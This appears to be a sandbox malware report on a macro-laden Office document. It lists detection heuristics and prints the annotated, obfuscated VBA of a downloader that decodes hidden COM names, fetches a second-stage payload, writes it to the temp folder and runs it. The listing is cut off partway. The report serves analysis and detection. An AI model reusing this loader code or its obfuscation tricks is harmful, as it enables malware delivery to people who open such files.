MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample is a Microsoft Office document containing heavily obfuscated VBA macros. The 'Document_Open' macro, triggered automatically, uses `CreateObject` and `CallByName` to execute code that appears to download and run a second-stage payload. The obfuscation and auto-execution mechanism strongly suggest a malicious downloader.
Heuristics 7
-
VBA macros detected medium 5 related findings OLE_VBA_MACROS — Document contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER — Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPEN — Document_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJ — CreateObject call
-
CallByName call high OLE_VBA_CALLBYNAME — CallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC — Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body). Note that this particular URL is the standard DrawingML XML namespace identifier present in ordinary Office files, not a network indicator; the actual download URL is passed into the macro at runtime and is not visible in the extracted source.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 59142d27ddb2e923ce1f63193e9ef5a96c698f33227bdbe02f26ab70095c0225) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5138 bytes |
Preview script — first 1,000 lines of the extracted script (the listing below is truncated; procedures referenced but not shown, such as NVWkzqvezZgf and DsIbCsAMYYQK, are in the part not displayed).
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Download stage: fetches the URL in XpglqKjlfkLP over HTTP and writes the response body to the
' file path in FoxjWhXVhRRv. Returns True on success; any runtime error or a non-200 status jumps
' to the pZTjEVAdkvWl label and returns False.
' NOTE(review): every "decodes to" value below is derived from LvEaAQLfcpSl (char code - 1, then
' reversed) and assumes the unseen helper NVWkzqvezZgf returns each character's code — confirm
' against the full source. None of these COM ProgIDs or method names appear literally in the macro,
' which is why string-based scanning misses them; hooking CreateObject / macro runtime logging does not.
Private Function ghNCtWppVfZx(ByVal XpglqKjlfkLP As String, ByVal FoxjWhXVhRRv As String) As Boolean
Dim dHUvpLIBxbje As Object
Dim cDAtmgMwzifd As Variant
Dim uwYXZGZbVSYh As Integer
Dim FJIvzFapPoxp As Object
Dim AvNgMWAdFAwJ As String
On Error GoTo pZTjEVAdkvWl
' Decodes to "MSXML2.ServerXMLHTTP.6.0".
AvNgMWAdFAwJ = LvEaAQLfcpSl("1/7/QUUIMNYsfwsfT/3MNYTN")
Set FJIvzFapPoxp = CreateObject(AvNgMWAdFAwJ)
' CallByName call type 1 = VbMethod. Decodes to .Open "GET", <url>, False (synchronous request).
CallByName FJIvzFapPoxp, LvEaAQLfcpSl("ofqP"), 1, LvEaAQLfcpSl("UFH"), XpglqKjlfkLP, False
' Decodes to .Send
CallByName FJIvzFapPoxp, LvEaAQLfcpSl("eofT"), 1
' Call type 2 = VbGet. Decodes to .Status
uwYXZGZbVSYh = CallByName(FJIvzFapPoxp, LvEaAQLfcpSl("tvubuT"), 2)
' 100 + 100 is HTTP 200 written to avoid a literal 200 in the source.
If uwYXZGZbVSYh <> 100 + 100 Then
GoTo pZTjEVAdkvWl
End If
' Decodes to .ResponseBody (raw bytes of the second stage).
cDAtmgMwzifd = CallByName(FJIvzFapPoxp, LvEaAQLfcpSl("zepCftopqtfS"), 2)
' Decodes to "ADODB.Stream" — used to persist the bytes to disk.
Set dHUvpLIBxbje = CreateObject(LvEaAQLfcpSl("nbfsuT/CEPEB"))
' Helpers below each wrap one CallByName on the stream: Type = 1, Open, Write <body>.
KgmBwNiAFOKP dHUvpLIBxbje
xYheJuZKfaQv dHUvpLIBxbje
awGBIfgvjbAc dHUvpLIBxbje, cDAtmgMwzifd
' DsIbCsAMYYQK is not in the visible listing; it receives the stream and the target path,
' so presumably SaveToFile — verify in the truncated portion.
DsIbCsAMYYQK dHUvpLIBxbje, FoxjWhXVhRRv
' PdLDSioJAVSH is cut off in the listing; likely the stream Close — verify.
PdLDSioJAVSH dHUvpLIBxbje
ghNCtWppVfZx = True
Exit Function
pZTjEVAdkvWl:
ghNCtWppVfZx = False
End Function
' Returns the decoded method name "Run" (decoder: char code - 1, reversed; assumes NVWkzqvezZgf
' returns character codes). Used as the CallByName method on Application in the procedures that
' chain to each other through Application.Run.
Private Function IIzjPkemqqnL()
IIzjPkemqqnL = LvEaAQLfcpSl("ovS")
End Function
' Sets .Type = 1 on the object passed in (call type 4 = VbLet; "fqzU" decodes to "Type").
' The caller passes an ADODB.Stream, for which 1 is the binary stream type.
Private Sub KgmBwNiAFOKP(ByVal uKFgvPVMydzM As Variant)
CallByName uKFgvPVMydzM, LvEaAQLfcpSl("fqzU"), 4, 1
End Sub
' Builds the drop-file path "<temp folder>/<Rnd>" using the Scripting FileSystemObject.
' Returns "" (uninitialised String) if GetSpecialFolder yields an empty string.
' Decoded values assume the decoder is char code - 1 then reverse — confirm against NVWkzqvezZgf.
Private Function KPKaiNEnahVT() As String
Dim rJrhievvCfyl As Object
Dim QXTQfpZtKexX As String
Dim SHgDlrOjRXLV
' Decodes to "Scripting.FileSystemObject".
SHgDlrOjRXLV = LvEaAQLfcpSl("udfkcPnfutzTfmjG/hojuqjsdT")
Set rJrhievvCfyl = CreateObject(SHgDlrOjRXLV)
' Decodes to "GetSpecialFolder"; argument 2 is the TemporaryFolder constant.
' Note the named VbMethod constant is used here while other call sites use the literal 1.
SHgDlrOjRXLV = LvEaAQLfcpSl("sfempGmbjdfqTufH")
QXTQfpZtKexX = CallByName(rJrhievvCfyl, SHgDlrOjRXLV, VbMethod, 2)
If QXTQfpZtKexX <> "" Then
' "0" decodes to "/". Rnd supplies the file name; no Randomize call is visible, so the
' sequence is presumably repeatable per process — a possible artefact for hunting.
KPKaiNEnahVT = QXTQfpZtKexX & LvEaAQLfcpSl("0") & Rnd
End If
End Function
' Hand-rolled string length: advances an index through Mid() one character at a time until
' Mid returns "", then returns index - 1. Functionally Len(); presumably written this way to keep
' another recognisable token out of the source (inference).
Private Function FiqyDLoZMATY(ByVal LWZLTNNGxYir As String) As Integer
Dim JRtxRzUKmPqn
JRtxRzUKmPqn = 1
While Mid(LWZLTNNGxYir, JRtxRzUKmPqn, 1) <> ""
JRtxRzUKmPqn = JRtxRzUKmPqn + 1
Wend
FiqyDLoZMATY = JRtxRzUKmPqn - 1
End Function
' Download-and-execute sink. Builds a temp path, downloads XpglqKjlfkLP into it via
' ghNCtWppVfZx, then launches the file through WScript.Shell.Exec.
' The Boolean returned by ghNCtWppVfZx is ignored and the error handler label is empty, so a
' failed download still reaches the Exec attempt and every error is silently swallowed.
' Decoded values assume the decoder is char code - 1 then reverse — confirm against NVWkzqvezZgf.
Private Sub zPfxwgLIQVwW(ByVal XpglqKjlfkLP As String)
Dim lyvRMzbxdroI As String
Dim VbVQyuDWGZld As Object
Dim xKPXWuUjiAdg
On Error GoTo pZTjEVAdkvWl
' Drop path in the temp folder.
lyvRMzbxdroI = KPKaiNEnahVT
' Return value (success flag) is discarded.
ghNCtWppVfZx XpglqKjlfkLP, lyvRMzbxdroI
' Decodes to "WScript.Shell".
xKPXWuUjiAdg = LvEaAQLfcpSl("mmfiT/uqjsdTX")
Set VbVQyuDWGZld = CreateObject(xKPXWuUjiAdg)
' Decodes to .Exec <drop path> (call type 1 = VbMethod) — the process-creation point to alert on
' (winword.exe spawning the dropped file).
CallByName VbVQyuDWGZld, LvEaAQLfcpSl("dfyF"), 1, lyvRMzbxdroI
Exit Sub
pZTjEVAdkvWl:
End Sub
' Calls .Write DDPDWEuozhSo on the object passed in (call type 1 = VbMethod; "fujsX" decodes to
' "Write"). The caller passes the ADODB.Stream and the HTTP response body.
Private Sub awGBIfgvjbAc(ByVal uKFgvPVMydzM As Variant, ByVal DDPDWEuozhSo As Variant)
CallByName uKFgvPVMydzM, LvEaAQLfcpSl("fujsX"), 1, DDPDWEuozhSo
End Sub
' One link of the Application.Run call chain: invokes Application.Run "<decoded name>".
' "eJguiOnRphWC" decodes (char code - 1, reversed) to a procedure name that does not appear in
' the visible listing; presumably it lives in the truncated portion — verify.
' Routing calls through Application.Run by decoded name hides the procedure graph from static review.
Private Sub vzJhVatEBVoy()
Dim VeiNJzUrDrDg
Dim jJBTFGDHthQs
Dim JQOckBcjjlel
VeiNJzUrDrDg = LvEaAQLfcpSl("eJguiOnRphWC")
' IIzjPkemqqnL returns the decoded method name "Run".
JQOckBcjjlel = IIzjPkemqqnL
' Result of the Run call is stored but never used.
jJBTFGDHthQs = CallByName(Application, JQOckBcjjlel, VbMethod, VeiNJzUrDrDg)
End Sub
' String decoder used for every ProgID, method and procedure name in this module.
' For each position i of the input: takes NVWkzqvezZgf(input, i) - 1, converts it with Chr, and
' PREPENDS it to the result, so the output is the per-character shift reversed.
' NVWkzqvezZgf is not in the visible listing; if it returns the character code (Asc of the i-th
' character), this is a shift-by-one Caesar plus string reversal — confirm in the full source.
' FiqyDLoZMATY supplies the length (custom Len).
Private Function LvEaAQLfcpSl(ByVal lrgPbThREpKm As String) As String
Dim aaZFeTqSvrER As Integer
Dim AnBobeUQDpDD As String
LvEaAQLfcpSl = ""
For aaZFeTqSvrER = 1 To FiqyDLoZMATY(lrgPbThREpKm)
AnBobeUQDpDD = Chr(NVWkzqvezZgf(lrgPbThREpKm, aaZFeTqSvrER) - 1)
' Prepend, not append: this is what reverses the string.
LvEaAQLfcpSl = AnBobeUQDpDD & LvEaAQLfcpSl
Next aaZFeTqSvrER
End Function
' Calls .Open on the object passed in (call type 1 = VbMethod; "ofqP" decodes to "Open").
' The caller passes the ADODB.Stream before writing the response body to it.
Private Sub xYheJuZKfaQv(ByVal eqSYWaSfWYQK As Variant)
CallByName eqSYWaSfWYQK, LvEaAQLfcpSl("ofqP"), 1
End Sub
' Link of the Application.Run call chain: "zpWCFubWiK{w" decodes (char code - 1, reversed) to
' "vzJhVatEBVoy", the Sub defined above, so this is Application.Run "vzJhVatEBVoy".
' Decoded name assumes NVWkzqvezZgf returns character codes — confirm against the full source.
Private Sub CPSnyVKvrvnG()
Dim YTRFoEHLxOEW
Dim OHBcICEmNbzK
Dim uTnRUWANbrxQ
' "Run"
uTnRUWANbrxQ = IIzjPkemqqnL
YTRFoEHLxOEW = LvEaAQLfcpSl("zpWCFubWiK{w")
' Return value is stored but never used.
OHBcICEmNbzK = CallByName(Application, uTnRUWANbrxQ, VbMethod, YTRFoEHLxOEW)
End Sub
' Link of the Application.Run call chain: "HowswLWzoTQD" decodes (char code - 1, reversed) to
' "CPSnyVKvrvnG", the Sub defined above, so this is Application.Run "CPSnyVKvrvnG".
' Visible order of the chain is therefore SsoTJTiTYzij -> CPSnyVKvrvnG -> vzJhVatEBVoy -> (unseen).
' Decoded names assume NVWkzqvezZgf returns character codes — confirm against the full source.
Private Sub SsoTJTiTYzij()
Dim FbufXBvHPPwJ
Dim xRqqKnhlVdEi
Dim AgVQNZUXlDyD
' "Run"
AgVQNZUXlDyD = IIzjPkemqqnL
FbufXBvHPPwJ = LvEaAQLfcpSl("HowswLWzoTQD")
' Return value is stored but never used.
xRqqKnhlVdEi = CallByName(Application, AgVQNZUXlDyD, VbMethod, FbufXBvHPPwJ)
End Sub
Private Sub PdLDSioJAVSH(ByVal uKFgvPVMydzM As Variant)
CallByName uKFgvPVMydzM, LvEaAQLfcpS
... (truncated)